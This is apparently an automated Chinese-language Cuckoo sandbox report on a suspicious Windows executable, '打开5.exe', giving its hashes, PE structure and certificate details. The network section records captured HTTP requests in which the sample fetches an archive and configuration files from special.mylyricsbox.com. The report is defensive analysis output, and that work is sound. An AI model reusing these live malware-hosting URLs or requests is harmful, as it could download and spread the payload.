分析类型 | 虚拟机标签 | 开始时间 | 结束时间 | 持续时间 |
---|---|---|---|---|
文件 (Windows) | win7-sp1-x64-shaapp03-1 | 2024-04-22 17:34:29 | 2024-04-22 17:35:10 | 41 秒 |
文件名 | 打开5.exe |
---|---|
文件大小 | 437248 字节 |
文件类型 | PE32+ executable (GUI) x86-64, for MS Windows |
MD5 | 2e2773be6cbe4ff7a1683e4621df5255 |
SHA1 | c9705f5596a56e88cfb2205dd13fd56dc674c40c |
SHA256 | 0d859be750ef8d175f671654f30e9afddfccd512fb8acf4b151939d5a3c05db8 |
SHA512 | 90ec6f256fd04c5fa39d0cb8c8b72f4b51394621cfa212d5a1df66a1597df26a1617739f819ba555f335d88f9522466e4404496c136a09d797165d56a983fab3 |
CRC32 | A19C6846 |
Ssdeep | 6144:cSCOeIKcleyZpnEkNmn8zEHcff10UU8BdGQxJCMj:cSCOVLvXEk4n8IHMfyG4OJZ |
Yara | 登录查看Yara规则 |
找不到该样本 提交漏报 |
直接 | IP | 安全评级 | 地理位置 |
---|---|---|---|
否 | 149.129.12.38 | 马来西亚 |
域名 | 安全评级 | 响应 |
---|---|---|
special.mylyricsbox.com | 未知 |
A 149.129.12.38 CNAME outhook.oss-ap-northeast-2.aliyuncs.com |
初始地址 | 0x00400000 |
---|---|
入口地址 | 0x0040beb0 |
声明校验值 | 0x0007313a |
实际校验值 | 0x0007313a |
最低操作系统版本要求 | 4.0 |
PDB路径 | c:\Users\86130\Desktop\00\x64\release\00.pdb |
编译时间 | 2024-04-11 11:59:16 |
载入哈希 | ed05db898e2d3a03abc3f211d0ebda5b |
图标 | |
图标精确哈希值 | e8f2bc5505598bcaa2ca3d5e277057c5 |
图标相似性哈希值 | 97b9e1cb20abc6171ea88a91083ca6fa |
LegalCopyright | |
---|---|
FileVersion | |
CompanyName | |
ProductName | |
ProductVersion | |
FileDescription | |
OriginalFilename | |
Translation |
SHA1 | 时间戳 | 有效性 | 错误 |
---|---|---|---|
None | Mon Apr 22 14:24:01 2024 | A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider. |
证书链 | Certificate Chain 1 |
发行给 | andy |
发行人 | andy |
有效期 | Sun Jan 01 075959 2040 |
SHA1 哈希 | 4e0e0162dbba961596a17b102c26c04d7c853811 |
证书链 | Timestamp Chain 1 |
发行给 | GlobalSign |
发行人 | GlobalSign |
有效期 | Sun Dec 10 080000 2034 |
SHA1 哈希 | 8094640eb5a7a1ca119c1fddd59f810263a7fbd1 |
证书链 | Timestamp Chain 2 |
发行给 | GlobalSign Timestamping CA - SHA384 - G4 |
发行人 | GlobalSign |
有效期 | Sun Dec 10 080000 2034 |
SHA1 哈希 | f585500925786f88e721d235240a2452ae3d23f9 |
证书链 | Timestamp Chain 3 |
发行给 | Globalsign TSA for Advanced - G4 - 202311 |
发行人 | GlobalSign Timestamping CA - SHA384 - G4 |
有效期 | Mon Dec 04 183002 2034 |
SHA1 哈希 | e201ff2bd75afdf8bc0c2c1b51bd58f8631d38b6 |
名称 | 虚拟地址 | 虚拟大小 | 原始数据大小 | 特征 | 熵(Entropy) |
---|---|---|---|---|---|
.text | 0x00001000 | 0x0001423a | 0x00014400 | IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ | 5.96 |
.rdata | 0x00016000 | 0x00006060 | 0x00006200 | IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ | 4.77 |
.data | 0x0001d000 | 0x00002458 | 0x00001400 | IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE | 2.08 |
.pdata | 0x00020000 | 0x00001b30 | 0x00001c00 | IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ | 4.65 |
.rsrc | 0x00022000 | 0x0004b4cc | 0x0004b600 | IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ | 5.88 |
偏移量 | 0x00069000 |
大小 | 0x00001c00 |
名称 | 偏移量 | 大小 | 语言 | 子语言 | 熵(Entropy) | 文件类型 |
---|---|---|---|---|---|---|
RT_ICON | 0x0006c8a4 | 0x00000468 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 4.06 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0006c8a4 | 0x00000468 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 4.06 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0006c8a4 | 0x00000468 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 4.06 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0006c8a4 | 0x00000468 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 4.06 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0006c8a4 | 0x00000468 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 4.06 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0006c8a4 | 0x00000468 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 4.06 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0006c8a4 | 0x00000468 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 4.06 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0006c8a4 | 0x00000468 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 4.06 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0006c8a4 | 0x00000468 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 4.06 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0006c8a4 | 0x00000468 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 4.06 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0006c8a4 | 0x00000468 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 4.06 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0006c8a4 | 0x00000468 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 4.06 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0006c8a4 | 0x00000468 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 4.06 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0006c8a4 | 0x00000468 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 4.06 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0006c8a4 | 0x00000468 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 4.06 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0006c8a4 | 0x00000468 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 4.06 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0006c8a4 | 0x00000468 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 4.06 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0006c8a4 | 0x00000468 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 4.06 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0006c8a4 | 0x00000468 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 4.06 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0006c8a4 | 0x00000468 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 4.06 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0006c8a4 | 0x00000468 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 4.06 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0006c8a4 | 0x00000468 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 4.06 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0006c8a4 | 0x00000468 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 4.06 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0006c8a4 | 0x00000468 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 4.06 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0006c8a4 | 0x00000468 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 4.06 | GLS_BINARY_LSB_FIRST |
RT_MENU | 0x0006cd0c | 0x00000050 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 3.25 | data |
RT_DIALOG | 0x0006cd5c | 0x000000be | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 3.57 | data |
RT_STRING | 0x0006ce1c | 0x0000002c | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 1.05 | data |
RT_ACCELERATOR | 0x0006ce48 | 0x00000010 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 1.80 | data |
RT_GROUP_ICON | 0x0006cf54 | 0x00000076 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 2.89 | MS Windows icon resource - 8 icons, 32x32, 16 colors |
RT_GROUP_ICON | 0x0006cf54 | 0x00000076 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 2.89 | MS Windows icon resource - 8 icons, 32x32, 16 colors |
RT_GROUP_ICON | 0x0006cf54 | 0x00000076 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 2.89 | MS Windows icon resource - 8 icons, 32x32, 16 colors |
RT_VERSION | 0x0006cfcc | 0x00000330 | LANG_NEUTRAL | SUBLANG_NEUTRAL | 3.45 | data |
RT_MANIFEST | 0x0006d2fc | 0x000001cd | LANG_ENGLISH | SUBLANG_ENGLISH_US | 4.78 | ASCII text |
直接 | IP | 安全评级 | 地理位置 |
---|---|---|---|
否 | 149.129.12.38 | 马来西亚 |
源地址 | 源端口 | 目标地址 | 目标端口 |
---|---|---|---|
192.168.122.201 | 49161 | 149.129.12.38 special.mylyricsbox.com | 80 |
192.168.122.201 | 49162 | 149.129.12.38 special.mylyricsbox.com | 80 |
192.168.122.201 | 49160 | 23.209.84.72 | 80 |
源地址 | 源端口 | 目标地址 | 目标端口 |
---|---|---|---|
192.168.122.201 | 56270 | 192.168.122.1 | 53 |
192.168.122.201 | 59401 | 192.168.122.1 | 53 |
域名 | 安全评级 | 响应 |
---|---|---|
special.mylyricsbox.com | 未知 |
A 149.129.12.38 CNAME outhook.oss-ap-northeast-2.aliyuncs.com |
源地址 | 源端口 | 目标地址 | 目标端口 |
---|---|---|---|
192.168.122.201 | 49161 | 149.129.12.38 special.mylyricsbox.com | 80 |
192.168.122.201 | 49162 | 149.129.12.38 special.mylyricsbox.com | 80 |
192.168.122.201 | 49160 | 23.209.84.72 | 80 |
源地址 | 源端口 | 目标地址 | 目标端口 |
---|---|---|---|
192.168.122.201 | 56270 | 192.168.122.1 | 53 |
192.168.122.201 | 59401 | 192.168.122.1 | 53 |
URI | HTTP数据 |
---|---|
URL专业沙箱检测 -> http://acroipm.adobe.com/11/rdr/CHS/win/nooem/none/message.zip | GET /11/rdr/CHS/win/nooem/none/message.zip HTTP/1.1 Accept: */* If-Modified-Since: Mon, 08 Nov 2017 08:44:36 GMT User-Agent: IPM Host: acroipm.adobe.com Connection: Keep-Alive Cache-Control: no-cache |
URL专业沙箱检测 -> http://special.mylyricsbox.com/longlingqian.rar | GET /longlingqian.rar HTTP/1.1 User-Agent: 66df1234 Host: special.mylyricsbox.com Cache-Control: no-cache |
URL专业沙箱检测 -> http://special.mylyricsbox.com/output.log | GET /output.log HTTP/1.1 User-Agent: MyApp Host: special.mylyricsbox.com Cache-Control: no-cache |
URL专业沙箱检测 -> http://special.mylyricsbox.com/config.ini | GET /config.ini HTTP/1.1 User-Agent: MyApp Host: special.mylyricsbox.com Cache-Control: no-cache |
URL专业沙箱检测 -> http://special.mylyricsbox.com/tdIdd.inf | GET /tdIdd.inf HTTP/1.1 User-Agent: MyApp Host: special.mylyricsbox.com Cache-Control: no-cache |
无SMTP流量.
无IRC请求.
无ICMP流量.
无 CIF 结果
无警报
No TLS
No Suricata HTTP
HTML 总结报告 (需15-60分钟同步) |
下载 |
---|
Task ID | 744211 |
---|---|
Mongo ID | 66262fc57e769a7ecd4b4ed3 |
Cuckoo release | 1.4-Maldun |